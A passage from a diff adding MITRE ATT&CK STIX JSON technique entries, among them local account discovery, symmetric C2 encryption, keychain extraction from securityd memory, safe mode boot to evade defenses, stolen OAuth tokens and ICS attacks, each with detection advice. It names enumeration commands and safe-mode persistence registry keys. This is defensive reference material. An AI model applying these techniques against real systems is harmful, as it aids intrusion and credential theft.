"1.1", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Application Log: Application Log Content", + "Process: Process Creation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0807", + "external_id": "T0807" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Command-Line Interface Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1059" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-12-26T20:58:19.356Z", + "name": "Symmetric Cryptography", + "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "created": "2020-03-16T15:45:17.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1573/001", + "external_id": "T1573.001" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-11T23:47:44.655Z", + "name": "Local Account", + "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniel Stepanic, Elastic", + "Miriam Wiesner, @miriamxyra, Microsoft Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "created": "2020-02-21T21:07:55.393Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1087/001", + "external_id": "T1087.001" + }, + { + "source_name": "id man page", + "description": "MacKenzie, D. and Robbins, A. (n.d.). id(1) - Linux man page. Retrieved January 11, 2024.", + "url": "https://linux.die.net/man/1/id" + }, + { + "source_name": "groups man page", + "description": "MacKenzie, D. and Youngman, J. (n.d.). groups(1) - Linux man page. Retrieved January 11, 2024.", + "url": "https://linux.die.net/man/1/groups" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + }, + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:00.575Z", + "name": "Point & Tag Identification", + "description": "Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: Dennis L. Sloatman September 2016) Tags are the identifiers given to points for operator convenience. \n\nCollecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jos Wetzels - Midnight Blue" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0861", + "external_id": "T0861" + }, + { + "source_name": "Dennis L. Sloatman September 2016", + "description": "Dennis L. Sloatman 2016, September 16 Understanding PLC Programming Methods and the Tag Database System Retrieved. 2017/12/19 ", + "url": "https://www.radioworld.com/industry/understanding-plc-programming-methods-and-the-tag-database-system" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:00.768Z", + "name": "Device Restart/Shutdown", + "description": "Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.\n\nUnexpected restart or shutdown of control system devices may prevent expected response functions happening during critical states.\n\nA device restart can also be a sign of malicious device modifications, as many updates require a shutdown in order to take effect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0816", + "external_id": "T0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Securityd Memory", + "description": "In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain)\n\nIf an adversary can obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2715c335-1bf2-4efe-9f18-0691317ff83b", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1167", + "external_id": "T1167" + }, + { + "source_name": "OS X Keychain", + "description": "Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved July 15, 2017.", + "url": "http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain" + }, + { + "source_name": "External to DA, the OS X Way", + "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", + "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way" + }, + { + "source_name": "OSX Keydnap malware", + "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", + "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:00.969Z", + "name": "User Execution", + "description": "Adversaries may rely on a targeted organizations user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. \n\nAdversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. (Citation: Booz Allen Hamilton) Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012 delivered malware through spearphishing attachments which required user action to achieve execution. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Application Log: Application Log Content", + "Network Traffic: Network Connection Creation", + "File: File Access", + "Process: Process Creation", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0863", + "external_id": "T0863" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + }, + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Social Media Accounts", + "description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", + "created": "2020-10-01T01:18:35.535Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1586/001", + "external_id": "T1586.001" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-11-02T15:39:10.534Z", + "name": "Application Access Token", + "description": "Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Mark Wee", + "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", + "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)", + "Shailesh Tiwary (Indian Army)", + "Jack Burns, HubSpot" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications. Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "SaaS", + "Office 365" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Multi-Factor Authentication", + "Logon Credentials" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--27960489-4e7f-461d-a62a-f5c0cb521e4a", + "created": "2019-08-30T12:55:58.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1527", + "external_id": "T1527" + }, + { + "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019", + "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", + "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/" + }, + { + "source_name": "Microsoft Identity Platform Access 2019", + "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens" + }, + { + "source_name": "okta", + "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.", + "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen" + }, + { + "source_name": "Staaldraad Phishing with OAuth 2017", + "description": "Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.", + "url": "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Safe Mode Boot", + "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jorell Magtibay, National Australia Bank Limited", + "Kiyohito Yamamoto, RedLark, NTT Communications", + "Yusuke Kubo, RedLark, NTT Communications" + ], + "x_mitre_detection": "Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a \\* in front of the \"Startup\" value name: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[\"\\*Startup\"=\"{Path}\"] or by adding a key to HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)\n\nMonitor execution of processes and commands associated with making configuration changes to boot settings, such as bcdedit.exe and bootcfg.exe.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host Intrusion Prevention Systems", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", + "created": "2021-06-23T20:00:27.600Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/009", + "external_id": "T1562.009" + }, + { + "source_name": "Microsoft Safe Mode", + "description": "Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021.", + "url": "https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234" + }, + { + "source_name": "Sophos Snatch Ransomware 2019", + "description": "Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021.", + "url": "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/" + }, + { + "source_name": "Microsoft bcdedit 2021", + "description": "Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit" + }, + { + "source_name": "CyberArk Labs Safe Mode 2016", + "description": "Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.", + "url": "https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise" + }, + { + "source_name": "Cybereason Nocturnus MedusaLocker 2020", + "description": "Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021.", + "url": "https://www.cybereason.com/blog/medusalocker-ransomware" + }, + { + "source_name": "BleepingComputer REvil 2021", + "description": "Abrams, L. (2021, March 19). REvil ransomware has a new ‘Windows Safe Mode’ encryption mode. Retrieved June 23, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/" + }, + { + "source_name": "Microsoft Bootcfg", + "description": "Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021.", + "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:01.165Z", + "name": "Wireless Compromise", + "description": "Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. \n\nA Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Scott Dougherty" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0860", + "external_id": "T0860" + }, + { + "source_name": "Alexander Bolshev March 2014", + "description": "Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved. 2020/01/05 ", + "url": "https://www.slideshare.net/dgpeters/17-bolshev-1-13" + }, + { + "source_name": "Alexander Bolshev, Gleb Cherbov July 2014", + "description": "Alexander Bolshev, Gleb Cherbov 2014, July 08 ICSCorsair: How I will PWN your ERP through 4-20 mA current loop Retrieved. 2020/01/05 ", + "url": "https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { 